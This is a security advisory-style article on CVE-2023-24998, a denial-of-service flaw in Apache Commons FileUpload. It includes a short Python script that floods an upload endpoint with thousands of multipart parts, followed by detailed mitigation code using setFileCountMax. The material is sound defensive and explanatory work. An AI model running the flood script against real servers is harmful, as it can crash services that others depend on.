Date of Public Disclosure: February 2023
CVSS Score: 7.5 (High)
Component Affected: Apache Commons FileUpload (versions 1.0 through 1.4, i.e. before 1.5)

What is CVE-2023-24998?

CVE-2023-24998 is a Denial-of-Service (DoS) vulnerability in Apache Commons FileUpload, a widely used Java library for parsing multipart/form-data uploads in web applications. Versions before 1.5 put no limit on the number of request parts (uploaded files and form fields) processed in a single request. An attacker can therefore send one upload, or a series of uploads, containing an enormous number of parts and make the server parse and buffer every one of them, consuming memory and CPU until the application slows down or crashes.

Why Does This Matter?

Many Java applications use FileUpload without ever declaring it as a dependency: Apache Struts 2 relies on it for multipart handling, Spring Framework 5.x and earlier ship a CommonsMultipartResolver that wraps it, and Apache Tomcat bundles a package-renamed copy (org.apache.tomcat.util.http.fileupload) for its own multipart support, so the same issue had to be fixed in Tomcat 8.5.85, 9.0.71, 10.1.5 and 11.0.0-M3. If your build pulls in commons-fileupload below 1.5 (mvn dependency:tree -Dincludes=commons-fileupload shows where it comes from), or you upgraded but never turned on the new limit, a handful of crafted uploads is enough to take the application down.

How Does the Attack Work?

An attacker sends a multipart/form-data POST request containing thousands or millions of parts; they can be tiny files or plain form fields. Because FileUpload below 1.5 has no part-count limit (setSizeMax and setFileSizeMax cap bytes, not parts), parseRequest creates a FileItem for every part and holds all of them in a list until the whole body has been consumed. With the default DiskFileItemFactory, parts under the in-memory threshold (10 KB by default) stay on the heap, so memory grows with the number of parts, and the per-part parsing work eats CPU. The result is an application that hangs or dies with an OutOfMemoryError, triggered by a request that is small compared with the damage it does.

Let's look at a simple Python script that sends a POST request with a massive number of parts:

import requests

url = "http://target-server/upload"
boundary = "----WebKitFormBoundary7MA4YWxkTrZugW"
headers = {"Content-Type": f"multipart/form-data; boundary={boundary}"}

# Generate 10,000 dummy parts (the count can be raised for a real test);
# each part is a plain form field, so the whole body stays small
parts = []
for i in range(10000):
    parts.append(
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="field{i}"\r\n\r\n'
        f"value{i}\r\n"
    )
parts.append(f"--{boundary}--\r\n")  # closing boundary
body = "".join(parts).encode()

response = requests.post(url, data=body, headers=headers, timeout=60)
print(response.status_code)

Warning: This example is for educational purposes only. Do not run it against systems you don't own or have written permission to test.


How To Fix / Mitigate

Upgrade FileUpload:

Update Apache Commons FileUpload to version 1.5 or later (Maven coordinates commons-fileupload:commons-fileupload, version 1.5). Upgrading alone does not close the hole: 1.5 adds the part-count limit, but its default is -1 (unlimited), so it has to be set explicitly on every ServletFileUpload (or FileUpload) instance you create.

ServletFileUpload upload = new ServletFileUpload(new DiskFileItemFactory());

// Set a reasonable max number of parts (files and form fields), e.g., 100; -1 (the default) means unlimited
upload.setFileCountMax(100);

When a request exceeds the limit, parseRequest throws FileUploadBase.FileCountLimitExceededException (a subclass of FileUploadException) as soon as the extra part is seen, so the rest of the body is never parsed.
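The following servlet is an added example written for this article, not code from the FileUpload project or the Apache advisory. It shows the complete hardened configuration: the new part-count limit alongside the per-file and per-request byte limits that already existed, with each limit failure mapped to an HTTP error so the request is rejected cheaply instead of parsed to exhaustion. The class name, servlet path, limit values and the javax.servlet API are assumptions; adjust them to your application (Jakarta EE 9+ uses the jakarta.servlet package instead).

```java
import java.io.IOException;
import java.util.List;

import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import org.apache.commons.fileupload.FileItem;
import org.apache.commons.fileupload.FileUploadBase;
import org.apache.commons.fileupload.FileUploadException;
import org.apache.commons.fileupload.disk.DiskFileItemFactory;
import org.apache.commons.fileupload.servlet.ServletFileUpload;

/**
 * Hypothetical upload endpoint (example code for this article, not part of
 * Commons FileUpload). Assumes commons-fileupload 1.5+ on the classpath and
 * the javax.servlet API; the path and the limits below are illustrative.
 */
@WebServlet("/upload")
public class HardenedUploadServlet extends HttpServlet {

    // Illustrative limits: size them to what the endpoint legitimately needs.
    static final long MAX_PARTS = 100;                        // files + form fields per request
    static final long MAX_FILE_BYTES = 10L * 1024 * 1024;     // per part
    static final long MAX_REQUEST_BYTES = 50L * 1024 * 1024;  // whole multipart body

    /** Builds a parser with every limit set; kept separate so it can be unit-tested. */
    static ServletFileUpload newUploadParser() {
        ServletFileUpload upload = new ServletFileUpload(new DiskFileItemFactory());
        upload.setFileCountMax(MAX_PARTS);     // CVE-2023-24998 fix; stays -1 (unlimited) unless set
        upload.setFileSizeMax(MAX_FILE_BYTES); // caps each part's content
        upload.setSizeMax(MAX_REQUEST_BYTES);  // caps the whole request body
        return upload;
    }

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse resp)
            throws ServletException, IOException {
        if (!ServletFileUpload.isMultipartContent(req)) {
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST, "multipart/form-data expected");
            return;
        }

        List<FileItem> items;
        try {
            items = newUploadParser().parseRequest(req);
        } catch (FileUploadBase.FileCountLimitExceededException e) {
            // Thrown as soon as a part beyond MAX_PARTS is seen; the remaining body is not parsed.
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST,
                           "too many parts in request (limit " + MAX_PARTS + ")");
            return;
        } catch (FileUploadBase.SizeLimitExceededException
                 | FileUploadBase.FileSizeLimitExceededException e) {
            resp.sendError(HttpServletResponse.SC_REQUEST_ENTITY_TOO_LARGE, "upload too large");
            return;
        } catch (FileUploadException e) {
            resp.sendError(HttpServletResponse.SC_BAD_REQUEST, "malformed multipart request");
            return;
        }

        int files = 0;
        int fields = 0;
        try {
            for (FileItem item : items) {
                if (item.isFormField()) {
                    fields++;   // item.getFieldName() / item.getString() would be consumed here
                } else {
                    files++;    // item.getName() / item.getInputStream() would be stored here
                }
            }
            resp.setContentType("text/plain");
            resp.getWriter().printf("accepted %d file(s) and %d field(s)%n", files, fields);
        } finally {
            // Parts above the in-memory threshold were spooled to temp files; remove them
            // now rather than relying on finalizers.
            for (FileItem item : items) {
                item.delete();
            }
        }
    }
}
```

The count limit is enforced while parseRequest collects the items; if your code drives getItemIterator directly, count the parts yourself rather than assuming the limit is applied for you. Keeping all three limits in one factory method makes it easy to assert in a unit test that no upload path in the application is ever built without them.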

References

- Official Apache Commons FileUpload Advisory (Apache security announcement for CVE-2023-24998)
- NVD CVE-2023-24998 Entry: https://nvd.nist.gov/vuln/detail/CVE-2023-24998
- GitHub Fix Commit

Conclusion

If you use Apache Commons FileUpload, directly or through a framework or container that bundles it, you are exposed to a simple but effective DoS attack. The fix is straightforward: upgrade to 1.5 or later and set a sensible part-count limit with setFileCountMax. Remember that the limit is off by default even after the upgrade; secure your uploads today, and you can avoid waking up to a crashed server tomorrow.

Timeline

Published on: 02/20/2023 16:15:00 UTC
Last modified on: 03/01/2023 15:09:00 UTC